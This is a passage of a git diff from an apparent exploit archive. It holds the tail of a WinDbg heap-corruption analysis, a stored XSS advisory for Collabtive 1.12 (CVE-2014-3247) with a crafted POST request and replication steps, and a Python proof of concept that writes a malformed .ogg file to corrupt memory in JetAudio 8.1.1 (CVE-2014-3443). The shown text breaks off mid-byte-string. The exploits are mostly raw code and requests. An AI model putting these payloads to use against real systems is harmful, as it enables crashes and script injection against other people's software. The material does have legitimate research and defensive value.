busy (278) + 00a620c8: 00280 . 00280 [01] - busy (278) + 00a62348: 00280 . 00248 [01] - busy (23c) + 00a62590: 00248 . 00248 [01] - busy (23c) + 00a627d8: 00248 . 00248 [01] - busy (23c) + 00a62a20: 00248 . 00248 [01] - busy (23c) + 00a62c68: 00248 . 00248 [01] - busy (23c) + 00a62eb0: 00248 . 00248 [01] - busy (23c) + 00a630f8: 00248 . 00248 [01] - busy (23c) + 00a63340: 00248 . 00248 [01] - busy (23c) + 00a63588: 00248 . 00248 [01] - busy (23c) + 00a637d0: 00248 . 00248 [01] - busy (23c) + 00a63a18: 00248 . 00248 [01] - busy (23c) + 00a63c60: 00248 . 00248 [01] - busy (23c) + 00a63ea8: 00248 . 00248 [01] - busy (23c) + 00a640f0: 00248 . 00248 [01] - busy (23c) + 00a64338: 00248 . 00248 [01] - busy (23c) + 00a64580: 00248 . 00248 [01] - busy (23c) + 00a647c8: 00248 . 00248 [01] - busy (23c) + 00a64a10: 00248 . 00248 [01] - busy (23c) + 00a64c58: 00248 . 00248 [01] - busy (23c) + 00a64ea0: 00248 . 001c8 [01] - busy (1bc) + 00a65068: 001c8 . 00248 [01] - busy (23c) + 00a652b0: 00248 . 00248 [01] - busy (23c) + 00a654f8: 00248 . 00248 [01] - busy (23c) + 00a65740: 00248 . 00220 [01] - busy (218) + 00a65960: 00220 . 00248 [01] - busy (23c) + 00a65ba8: 00248 . 00248 [01] - busy (23c) + 00a65df0: 00248 . 00278 [01] - busy (270) + 00a66068: 00278 . 00248 [01] - busy (23c) + 00a662b0: 00248 . 00248 [01] - busy (23c) + 00a664f8: 00248 . 00248 [01] - busy (23c) + 00a66740: 00248 . 00248 [01] - busy (23c) + 00a66988: 00248 . 00118 [01] - busy (110) + 00a66aa0: 00118 . 00248 [01] - busy (23c) + 00a66ce8: 00248 . 00248 [01] - busy (23c) + 00a66f30: 00248 . 00118 [01] - busy (110) + 00a67048: 00118 . 00248 [01] - busy (23c) + 00a67290: 00248 . 00248 [01] - busy (23c) + 00a674d8: 00248 . 00220 [01] - busy (218) + 00a676f8: 00220 . 00248 [01] - busy (23c) + 00a67940: 00248 . 00248 [01] - busy (23c) + 00a67b88: 00248 . 00248 [01] - busy (23c) + 00a67dd0: 00248 . 00248 [01] - busy (23c) + 00a68018: 00248 . 00248 [01] - busy (23c) + 00a68260: 00248 . 00248 [01] - busy (23c) + 00a684a8: 00248 . 00248 [01] - busy (23c) + 00a686f0: 00248 . 00248 [01] - busy (23c) + 00a68938: 00248 . 00248 [01] - busy (23c) + 00a68b80: 00248 . 00248 [01] - busy (23c) + 00a68dc8: 00248 . 00248 [01] - busy (23c) + 00a69010: 00248 . 00248 [01] - busy (23c) + 00a69258: 00248 . 00130 [01] - busy (128) + 00a69388: 00130 . 00248 [01] - busy (23c) + 00a695d0: 00248 . 00248 [01] - busy (23c) + 00a69818: 00248 . 00118 [01] - busy (110) + 00a69930: 00118 . 00248 [01] - busy (23c) + 00a69b78: 00248 . 00248 [01] - busy (23c) + 00a69dc0: 00248 . 00248 [01] - busy (23c) + 00a6a008: 00248 . 002a8 [01] - busy (29c) + 00a6a2b0: 002a8 . 00248 [01] - busy (23c) + 00a6a4f8: 00248 . 00248 [01] - busy (23c) + 00a6a740: 00248 . 00248 [01] - busy (23c) + 00a6a988: 00248 . 00248 [01] - busy (23c) + 00a6abd0: 00248 . 00248 [01] - busy (23c) + 00a6ae18: 00248 . 00248 [01] - busy (23c) + 00a6b060: 00248 . 00120 [01] - busy (118) + 00a6b180: 00120 . 00248 [01] - busy (23c) + 00a6b3c8: 00248 . 00248 [01] - busy (23c) + 00a6b610: 00248 . 00248 [01] - busy (23c) + 00a6b858: 00248 . 00248 [01] - busy (23c) + 00a6baa0: 00248 . 00248 [01] - busy (23c) + 00a6bce8: 00248 . 00248 [01] - busy (23c) + 00a6bf30: 00248 . 00248 [01] - busy (23c) + 00a6c178: 00248 . 00248 [01] - busy (23c) + 00a6c3c0: 00248 . 00248 [01] - busy (23c) + 00a6c608: 00248 . 00148 [01] - busy (140) + 00a6c750: 00148 . 00160 [01] - busy (158) + 00a6c8b0: 00160 . 02018 [01] - busy (2010) + 00a6e8c8: 02018 . 01008 [01] - busy (1000) + 00a6f8d0: 01008 . 00ad8 [00] + 00a703a8: 00ad8 . 00120 [01] - busy (115) + 00a704c8: 00120 . 00358 [01] - busy (34d) + 00a70820: 00358 . 00188 [01] - busy (180) + 00a709a8: 00188 . 00110 [01] - busy (104) + 00a70ab8: 00110 . 00050 [01] - busy (40) + 00a70b08: 00050 . 00358 [01] - busy (34c) + 00a70e60: 00358 . 00168 [01] - busy (160) + 00a70fc8: 00168 . 00118 [01] - busy (109) + 00a710e0: 00118 . 001c8 [01] - busy (1c0) + 00a712a8: 001c8 . 00168 [01] - busy (160) + 00a71410: 00168 . 00210 [01] - busy (202) + 00a71620: 00210 . 001e0 [01] - busy (1d8) + 00a71800: 001e0 . 00188 [01] - busy (180) + 00a71988: 00188 . 000f8 [00] + 00a71a80: 000f8 . 01808 [01] - busy (1800) + 00a73288: 01808 . 01808 [01] - busy (1800) + 00a74a90: 01808 . 01808 [01] - busy (1800) + 00a76298: 01808 . 00188 [01] - busy (180) + 00a76420: 00188 . 00188 [01] - busy (180) + 00a765a8: 00188 . 001e0 [01] - busy (1d8) + 00a76788: 001e0 . 00308 [01] - busy (300) + 00a76a90: 00308 . 00608 [01] - busy (600) + 00a77098: 00608 . 00180 [01] - busy (178) + 00a77218: 00180 . 00168 [01] - busy (160) + 00a77380: 00168 . 00180 [01] - busy (178) + 00a77500: 00180 . 00168 [01] - busy (15c) + 00a77668: 00168 . 00198 [01] - busy (190) + 00a77800: 00198 . 001f8 [01] - busy (1ec) + 00a779f8: 001f8 . 00188 [01] - busy (17c) + 00a77b80: 00188 . 00170 [01] - busy (164) + 00a77cf0: 00170 . 00170 [01] - busy (168) + 00a77e60: 00170 . 00178 [01] - busy (170) + 00a77fd8: 00178 . 00198 [01] - busy (18c) + 00a78170: 00198 . 001f8 [01] - busy (1ec) + 00a78368: 001f8 . 00170 [01] - busy (164) + 00a784d8: 00170 . 00170 [01] - busy (164) + 00a78648: 00170 . 00168 [01] - busy (15c) + 00a787b0: 00168 . 001b8 [01] - busy (1b0) + 00a78968: 001b8 . 00180 [01] - busy (174) + 00a78ae8: 00180 . 00188 [01] - busy (180) + 00a78c70: 00188 . 00100 [00] + 00a78d70: 00100 . 00180 [01] - busy (174) + 00a78ef0: 00180 . 00608 [01] - busy (600) + 00a794f8: 00608 . 00208 [01] - busy (200) + 00a79700: 00208 . 00188 [01] - busy (180) + 00a79888: 00188 . 00608 [01] - busy (600) + 00a79e90: 00608 . 00308 [01] - busy (300) + 00a7a198: 00308 . 00220 [01] - busy (214) + 00a7a3b8: 00220 . 003f8 [00] + 00a7a7b0: 003f8 . 003d0 [01] - busy (3c2) + 00a7ab80: 003d0 . 00248 [01] - busy (240) + 00a7adc8: 00248 . 00318 [01] - busy (30f) + 00a7b0e0: 00318 . 00228 [01] - busy (21e) + 00a7b308: 00228 . 00378 [01] - busy (370) + 00a7b680: 00378 . 00168 [01] - busy (160) + 00a7b7e8: 00168 . 00278 [01] - busy (270) + 00a7ba60: 00278 . 001e0 [01] - busy (1d8) + 00a7bc40: 001e0 . 00520 [01] - busy (518) + 00a7c160: 00520 . 00268 [01] - busy (25e) + 00a7c3c8: 00268 . 00178 [01] - busy (16f) + 00a7c540: 00178 . 00120 [01] - busy (116) + 00a7c660: 00120 . 00170 [01] - busy (167) + 00a7c7d0: 00170 . 00268 [01] - busy (25a) + 00a7ca38: 00268 . 003d8 [01] - busy (3cf) + 00a7ce10: 003d8 . 004d0 [01] - busy (4c2) + 00a7d2e0: 004d0 . 00408 [01] - busy (3fa) + 00a7d6e8: 00408 . 00118 [01] - busy (10c) + 00a7d800: 00118 . 00118 [01] - busy (10c) + 00a7d918: 00118 . 001a0 [01] - busy (197) + 00a7dab8: 001a0 . 00118 [01] - busy (10c) + 00a7dbd0: 00118 . 00608 [01] - busy (600) + 00a7e1d8: 00608 . 001e0 [01] - busy (1d8) + 00a7e3b8: 001e0 . 00188 [01] - busy (17b) + 00a7e540: 00188 . 00228 [01] - busy (21b) + 00a7e768: 00228 . 00068 [01] - busy (5c) + 00a7e7d0: 00068 . 00010 [01] - busy (4) + 00a7e7e0: 00010 . 00160 [01] - busy (154) + 00a7e940: 00160 . 00188 [01] - busy (180) + 00a7eac8: 00188 . 00160 [01] - busy (158) + 00a7ec28: 00160 . 00188 [01] - busy (180) + 00a7edb0: 00188 . 00160 [01] - busy (154) + 00a7ef10: 00160 . 00188 [01] - busy (180) + 00a7f098: 00188 . 00c08 [01] - busy (c00) + 00a7fca0: 00c08 . 001a8 [01] - busy (1a0) + 00a7fe48: 001a8 . 00188 [01] - busy (180) + 00a7ffd0: 00188 . 00018 [01] - busy (c) + 00a7ffe8: 00018 . 00018 [11] - busy (c) + Segment02 at 00a80000: + Flags: 00000000 + Base: 00a80000 + First Entry: 00a80040 + Last Entry: 00c80000 + Total Pages: 00000200 + Total UnCommit: 00000175 + Largest UnCommit:00172000 + UnCommitted Ranges: (2) + 00acb000: 00003000 + 00b0e000: 00172000 + + Heap entries for Segment02 in Heap 00970000 + 00a80000: 00000 . 00040 [01] - busy (40) + 00a80040: 00040 . 40008 [01] - busy (40000) + 00ac0048: 40008 . 00170 [01] - busy (164) + 00ac01b8: 00170 . 01808 [01] - busy (1800) + 00ac19c0: 01808 . 00408 [01] - busy (400) + 00ac1dc8: 00408 . 000c8 [01] - busy (c0) + 00ac1e90: 000c8 . 000c8 [01] - busy (c0) + 00ac1f58: 000c8 . 000a8 [01] - busy (93) + 00ac2000: 000a8 . 03008 [01] - busy (3000) + 00ac5008: 03008 . 00460 [01] - busy (453) + 00ac5468: 00460 . 00190 [01] - busy (188) + 00ac55f8: 00190 . 00188 [01] - busy (180) + 00ac5780: 00188 . 00170 [01] - busy (164) + 00ac58f0: 00170 . 00170 [01] - busy (164) + 00ac5a60: 00170 . 000d0 [00] + 00ac5b30: 000d0 . 001a0 [01] - busy (196) + 00ac5cd0: 001a0 . 001e0 [01] - busy (1d8) + 00ac5eb0: 001e0 . 05150 [10] + 00acb000: 00003000 - uncommitted bytes. + 00ace000: 00000 . 00018 [01] - busy (10) + 00ace018: 00018 . 00018 [01] - busy (10) + 00ace030: 00018 . 00198 [01] - busy (18f) + 00ace1c8: 00198 . 001e8 [01] - busy (1d9) + 00ace3b0: 001e8 . 00118 [01] - busy (10f) + 00ace4c8: 00118 . 003f8 [01] - busy (3eb) + 00ace8c0: 003f8 . 00168 [01] - busy (15a) + 00acea28: 00168 . 003e8 [01] - busy (3dc) + 00acee10: 003e8 . 001e0 [01] - busy (1d7) + 00aceff0: 001e0 . 00130 [01] - busy (128) + 00acf120: 00130 . 00030 [00] + 00acf150: 00030 . 001e0 [01] - busy (1d8) + 00acf330: 001e0 . 00160 [01] - busy (154) + 00acf490: 00160 . 001e0 [01] - busy (1d8) + 00acf670: 001e0 . 00160 [01] - busy (154) + 00acf7d0: 00160 . 001e0 [01] - busy (1d8) + 00acf9b0: 001e0 . 000c8 [01] - busy (c0) + 00acfa78: 000c8 . 00160 [01] - busy (158) + 00acfbd8: 00160 . 001e0 [01] - busy (1d8) + 00acfdb8: 001e0 . 00188 [01] - busy (180) + 00acff40: 00188 . 0c008 [01] - busy (c000) + 00adbf48: 0c008 . 20020 [01] - busy (20015) + 00afbf68: 20020 . 10020 [01] - busy (10015) + 00b0bf88: 10100 . 10100 [20] + unable to read heap entry at 00b1c088 + +The error message shown by windbg "unable to read heap entry at.." partially confirms that its a sign of memory / heap corruption. + +0:000> dt _HEAP_ENTRY 00adbf48 +ntdll!_HEAP_ENTRY + +0x000 Size : 0x4004 + +0x002 PreviousSize : 0x1801 + +0x000 SubSegmentCode : 0x18014004 + +0x004 SmallTagIndex : 0xc3 '' + +0x005 Flags : 0x1 '' + +0x006 UnusedBytes : 0xb '' + +0x007 SegmentIndex : 0x2 '' + + +0:000> dt _HEAP_ENTRY 00afbf68 +ntdll!_HEAP_ENTRY + +0x000 Size : 0x2004 + +0x002 PreviousSize : 0x4004 + +0x000 SubSegmentCode : 0x40042004 + +0x004 SmallTagIndex : 0xc7 '' + +0x005 Flags : 0x1 '' + +0x006 UnusedBytes : 0xb '' + +0x007 SegmentIndex : 0x2 '' + +Above two entries actually make sense. size and previous size matches for both of them. Now lets dessect the last entry + +0:000> dt _HEAP_ENTRY 00b0bf88 +ntdll!_HEAP_ENTRY + +0x000 Size : 0x2020 + +0x002 PreviousSize : 0x2020 + +0x000 SubSegmentCode : 0x20202020 + +0x004 SmallTagIndex : 0x20 ' ' + +0x005 Flags : 0x20 ' ' + +0x006 UnusedBytes : 0x20 ' ' + +0x007 SegmentIndex : 0x20 ' ' + +From above windbg output, it can be seen that metadata of 0x00b0bf88 is completely corrupted and overwritten with 0x20s which is nothing but spaces. + +0:000> dd 00b0bf88 +00b0bf88 20202020 20202020 20202020 20202020 +00b0bf98 20202020 20202020 20202020 20202020 +00b0bfa8 20202020 20202020 20202020 20202020 +00b0bfb8 20202020 20202020 20202020 20202020 +00b0bfc8 20202020 20202020 20202020 20202020 +00b0bfd8 20202020 20202020 20202020 20202020 +00b0bfe8 20202020 20202020 20202020 20202020 +00b0bff8 20202020 20202020 20202020 20202020 diff --git a/platforms/php/webapps/33250.txt b/platforms/php/webapps/33250.txt new file mode 100755 index 000000000..648cd2479 --- /dev/null +++ b/platforms/php/webapps/33250.txt @@ -0,0 +1,51 @@ +Vulnerability title: Stored XSS vulnerability in Collabtive application +(CVE-2014-3247) +CVE: CVE-2014-3247(coordinated with cve assigning team and vendor) +Vendor: Collabtive +Product: Collabtive (Open Source Project Management Software) +Affected version: 1.12 +Fixed version: 2.0 +Reported by: Deepak Rathore +Severity: Critical +URL: http://[domain]/collabtive-12/admin.php?action=addpro +Affected Users: Authenticated users +Affected parameter(s): desc + +Issue details: The value of the desc request parameter is copied into the +HTML document as plain text between tags. The payload 1c91ccc245622da6 was submitted in the desc parameter. +This input was echoed as 1c91ccc245622da6 in +the application's response. This proof-of-concept attack demonstrates that +it is possible to inject arbitrary JavaScript into the application's +response. The proof-of-concept attack demonstrated uses an event handler to +introduce arbitrary JavaScript into the document. + +HTTP request: +POST /collabtive-12/admin.php?action=addpro HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101 +Firefox/28.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/collabtive-12/index.php?mode=login +Cookie: PHPSESSID=ri2sqmga763p7qav73enfv99p5 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 75 +name=test&desc=test928a4a480a723950&neverdue=neverdue&budget=10&assignto%5B%5D=1&assignme=1 + +Steps to replicate: +1. Login into application +2. Go to "Desktop" tab and click on "Add project" +3. Fill the project details in the project form and click on "Add" button +4. Intercept request by interception proxy i.e. OWASP Zap, Burp Suite etc +5. Replace "desc" parameter value with "1c91ccc245622da6" +6. Forward manipulated request to server and wait for response in browser +7. A popup with alert message will come that is the proof of vulnerability. + +Tools used: Burp Suite proxy, Mozilla Firefox browser + +Best Regards, +Deepak diff --git a/platforms/windows/dos/33332.py b/platforms/windows/dos/33332.py new file mode 100755 index 000000000..dbec6556a --- /dev/null +++ b/platforms/windows/dos/33332.py @@ -0,0 +1,187 @@ +''' +# Exploit Title: [JetAudio memory corruption in latest Version 8.1.1 ] +# Date: [2014/05/08] +# Exploit Author: [Aryan Bayaninejad] +# Linkedin : [https://www.linkedin.com/profile/view?id=276969082] +# Vendor Homepage: [www.jetaudio.com] +# Version: [Version 8.1.1 and prior to that] +# Tested on: [Windows Xp Sp 3 x86] +# Found by : Piece Dumb Fuzzer +# CVE : [2014-3443] + +details: + +Jetaudio latest version V 8.1.1 suffers from an memory corruption +Vulnerability via a malformed .ogg file format when load JetMPAd.ax + + +Poc: +''' + +#!/usr/bin/python +data = +"\x4F\x67\x67\x53\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x00\x00\x00\x00\xC7\x72\x7C\x6F\x01\x1E\x01\x76\x6F\x72\x62\x69\x73\x00\x00\x00\x00\x05\x99\xAC\x00\x00\xFD\xFF\xCF\xFC\x09\xFF\x99\x0F\xF9\x0F\x8F\x7F\xB9\x01\x4F\x67\x67\x53\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x01\x00\x00\x00\x15\x5A\x7E\x0C\x11\x4A\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x03\x76\x6F\x72\x62\x69\x73\x00\x00\x00\x00\x58\x69\x70\x68\x2E\x4F\x72\x67\x20\x6C\x69\x62\x56\x6F\x72\x62\x69\x73\x20\x49\x20\x32\x30\x30\x32\x30\x37\x31\x37\x01\x00\x00\x00\x19\x00\x00\x00\x53\x6F\x6E\x79\x20\x4F\x67\x67\x20\x56\x6F\x72\x62\x69\x73\x20\x31\x2E\x30\x20\x46\x69\x6E\x61\x6C\x01\x05\x76\x6F\x72\x62\x69\x73\x29\x42\x43\x56\x01\x00\x08\x00\x00\x80\x22\x4C\x20\xC3\x80\xD0\x90\x55\x00\x00\x10\x00\x00\x80\xA8\x36\x14\x6B\xA9\xB1\xD6\x1A\x63\xA1\x28\x46\xD4\x62\x6A\x31\xC6\x18\x63\xE3\x2C\x46\x90\x62\x8B\x31\xC6\x18\x63\x8C\x31\xC6\x18\x63\x8C\x31\xC6\x18\x63\x20\x34\x64\x15\x00\x00\x04\x00\x40\x31\xEA\x15\x93\x9E\x42\xCC\x39\xE7\xDC\x18\xA6\x8D\x51\xDA\x29\xC7\x39\xE7\xDC\x18\xC5\x89\x30\x58\x21\xA5\xB9\xA5\x9A\x52\xCC\xA1\x93\x9C\x4A\xCA\x39\xE7\x1C\x08\x0D\x59\x05\x00\x00\x02\x00\x40\x48\x21\x85\x14\x52\x48\x21\x85\x14\x52\x48\x21\x85\x14\x52\x4A\x29\xA5\x94\x62\x8A\x29\xA6\x98\x62\x8A\x29\xA6\x98\x72\xCC\x31\xC7\x1C\x83\x0C\x32\xE8\xA4\x93\x4E\x3A\xE9\x24\xA4\x90\x42\x09\xA5\xA4\x92\x52\x4A\xAD\xC5\x1A\x6B\xEF\xBD\xF7\x9E\x7B\xEF\xBD\xF7\xDE\x7B\xEF\xBD\xF7\xDE\x7B\xEF\xBD\xF7\xDE\x7B\xCF\x39\x07\x42\x43\x56\x01\x00\x20\x00\x00\x04\x42\x06\x21\x84\x10\x42\x08\x21\x84\x14\x52\x48\x21\xA6\x98\x62\xCA\x29\xA7\x80\xD0\x90\x55\x00\x00\x20\x00\x80\x00\x00\x00\x00\x4B\xB1\x14\x4D\xD1\x1C\xCF\xF1\x1C\xCF\x11\x1D\x53\x12\x25\x53\x32\x25\x53\x72\x2D\xD7\x32\x2D\x53\x33\x3D\xD3\x33\x45\x55\x74\x55\x53\x55\x65\xD7\x75\x65\x53\x36\x65\x53\x36\x65\x55\x36\x65\x53\x36\x65\x53\x36\x65\xD5\x95\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x20\x34\x64\x15\x00\x20\x01\x00\xA0\x23\x39\x92\x23\x29\x8E\xE2\x38\x8E\xE3\x48\x92\x04\x84\x86\xAC\x02\x00\x64\x00\x00\x04\x00\x60\x28\x8A\xA3\x48\x8E\x24\x59\x92\x65\x59\x96\x67\x99\x9A\xE9\x99\x9E\x69\x9A\xA6\x69\x9A\xA6\x09\x84\x86\xAC\x02\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\xA0\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\x66\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x40\x68\xC8\x2A\x00\x40\x02\x00\x40\xC7\x71\x1C\xC7\x71\x1C\xC7\x71\x1C\x47\x72\x24\x07\x08\x0D\x59\x05\x00\xC8\x00\x00\x08\x00\x40\x52\x24\xC5\x72\x34\x47\x73\x34\xC7\x73\x3C\x47\x74\x44\x47\x94\x4C\x49\x95\x5C\x4B\xB6\x64\x0D\x08\x0D\x59\x05\x00\x00\x02\x00\x08\x00\x00\x00\x00\x00\x40\x33\x2C\x43\x53\x3C\x47\xB3\x44\x4D\xD4\x44\x51\xF4\x44\x4F\x14\x45\xD1\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x80\xD0\x90\x55\x00\x00\x04\x00\x00\x01\x9D\x66\x98\x6A\x80\x08\x33\x92\x59\x20\x34\x64\x15\x00\x80\x00\x00\x00\x10\x81\x0C\x53\x0C\x08\x0D\x59\x05\x00\x00\x04\x00\x00\x48\x91\xE4\x24\x89\x92\x93\x52\x4A\x39\x0C\x92\xC5\x24\xA9\x94\x93\x52\x4A\x79\x14\x93\x47\x35\xC9\x18\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\x0C\x92\xE5\x28\xA9\x94\x93\x52\x4A\x49\x8C\x92\xC5\x28\xA9\x52\x93\x52\x4A\x79\x94\x93\x27\x35\xC9\xD8\x93\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x59\x90\x92\x27\x2D\xE9\x1A\x94\x52\x4A\x49\x8E\x92\x06\x2D\xD9\xD4\x93\x52\x4A\x89\x52\x94\x28\x39\xD9\x9E\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\xF9\xA0\x94\x0F\x42\x29\xA5\x94\x52\x4A\xB9\xDA\x93\x6B\x3D\x29\xA5\x94\x52\x4A\x19\xA3\x94\xF0\x49\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\xCA\x08\x42\x43\x56\x01\x00\x40\x00\x00\x80\x71\xD6\x28\x87\xA2\x93\xE8\x7C\x71\x86\x72\xA6\x29\x48\x2A\x94\x26\x74\x6F\x92\xA3\xE4\x39\xC9\xAD\xB4\xDC\x9C\x6E\xC2\x39\xA7\x9B\x53\xCE\xF9\xE4\x9C\x73\x82\xD0\x90\x55\x00\x00\x20\x00\x00\x84\x10\x52\x48\x21\x85\x14\x52\x48\x21\x85\x14\x52\x88\x21\x86\x18\x72\xC8\x29\xA7\xA0\x82\x0A\x2A\xA9\xA4\xA2\x8A\x2A\xAA\xAC\xB2\xCC\x32\xCB\x2C\xB3\xCC\x32\xCB\x2C\xB3\xCC\x32\xEB\xAC\xA3\x8E\x3A\x0B\x29\x84\x92\x42\x0B\xAD\xD5\x18\x6B\x8C\xB1\xD5\xDE\x9C\xB4\x35\x47\x29\x9D\x94\x52\x4A\x29\xA5\x94\xCE\x39\xE7\x9C\x20\x34\x64\x15\x00\x00\x02\x00\x40\x20\x64\x90\x41\x06\x19\x65\x14\x52\x88\x21\xA6\x9C\x72\xCA\x29\xA8\xA4\x92\x0A\x08\x0D\x59\x05\x00\x00\x02\x00\x08\x00\x00\x00\x10\x25\xD3\x31\x1D\xD1\x11\x15\xD1\x11\x1D\xD1\x11\x1D\xD1\x11\x1D\xCF\xF1\x1C\x4F\x12\x25\xD1\xF2\x2C\x51\x33\x3D\x53\x34\x4D\xD3\x55\x65\x57\x96\x75\xD9\x96\x6D\x57\x97\x75\x5B\x97\x7D\xDB\xB7\x75\xDB\xB6\x7D\xDD\xD8\x8D\xDF\x38\x8E\xE3\x38\x8E\xE3\x38\x8E\xE3\x38\x8E\xE3\x38\x8E\x63\x08\x42\x43\x56\x01\x00\x20\x00\x00\x00\x42\x08\x21\x84\x14\x52\x48\x21\x85\x94\x62\x8A\x31\xE7\xA0\x83\x10\x42\x29\x81\xD0\x90\x55\x00\x00\x20\x00\x80\x00\x00\x00\x00\x45\x71\x14\xC7\x91\x1C\x49\x92\x24\x4B\xB2\x2C\xCD\xD2\x34\x4D\xD3\x34\x4F\xF4\x44\xCF\xF4\x54\xCF\x15\x65\xD1\x16\x6D\xCF\xF5\x6C\xD1\xF6\x5C\x4F\xF5\x54\x4F\x15\x55\x53\x35\x5D\xD3\x55\x5D\xD7\x75\x5D\xD5\x55\x65\x55\x76\x6D\xDB\xB6\x6D\xDB\xB6\x6D\xDB\xB6\x6D\xDB\xB6\x6D\xDB\xB6\x65\x20\x34\x64\x15\x00\x20\x01\x00\xA0\x23\x39\x92\x22\x29\x92\x22\x39\x8E\x23\x39\x92\x04\x84\x86\xAC\x02\x00\x64\x00\x00\x04\x00\xA0\x28\x8A\xE2\x38\x8E\xE4\x58\x92\x25\x69\x92\x28\x99\x96\x6A\xB9\x9A\xEC\xE9\x9E\x2E\xEA\xA2\x0E\x84\x86\xAC\x02\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x60\x88\x86\x68\x88\x8E\x68\x89\x9A\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x40\x68\xC8\x2A\x00\x40\x02\x00\x40\x47\x72\x24\xC7\x52\x2C\x45\x52\x24\xC5\x72\x2C\x07\x08\x0D\x59\x05\x00\xC8\x00\x00\x08\x00\xC0\x31\x1C\x43\x52\x24\xC7\xB2\x2C\x4B\xD3\x34\xCF\xF3\x3C\x4F\xF4\x44\x51\x14\x45\xD3\x54\x4D\x15\x08\x0D\x59\x05\x00\x00\x02\x00\x08\x00\x00\x00\x00\x00\x40\x51\x14\xCB\xB1\x1C\x49\xD2\x1C\x4F\x12\x1D\x51\x12\x25\xD1\x12\x25\x51\x13\x35\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x81\xD0\x90\x95\x00\x00\x19\x00\x00\x03\xB1\xF5\xD4\x72\xEE\x8D\xA0\x48\x2A\x47\xB5\xC6\xD4\x51\xE6\x24\x06\x61\x1A\x8A\xA0\x82\x18\x84\x0C\x15\x44\x88\x51\x0E\x26\x62\x0A\x19\x26\x39\x97\x0C\x3A\xA6\x98\xD4\x18\x4B\x2A\x1D\x73\x52\x6B\x4B\x25\x54\x48\x41\x0C\x36\xA6\x52\x29\xE5\xA8\x07\x42\x43\x56\x08\x00\xA1\x19\x00\x0E\xC7\x01\x24\xCD\x02\x24\x4B\x03\x00\x00\x00\x00\x00\x00\x00\x49\xD3\x00\xCD\xF3\x00\xCD\xF3\x00\x00\x00\x00\x00\x00\x00\x40\xD2\x34\xC0\xF2\x3C\x40\xF3\x3C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1C\x4D\x03\x34\xD1\x03\x34\xCF\x03\x00\x00\x00\x00\x00\x00\x00\x4D\xF4\x00\x4F\x34\x01\x4F\x14\x01\x00\x00\x00\x00\x00\x00\xC0\xF2\x3C\xC0\x33\x3D\xC0\x13\x4D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1C\x4D\x03\x34\xCF\x03\x34\xCF\x03\x00\x00\x00\x00\x00\x00\x00\xCB\xF3\x00\xCF\x14\x01\xCF\x33\x01\x00\x00\x00\x00\x00\x00\x40\xF3\x44\xC0\x13\x45\xC0\x33\x45\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0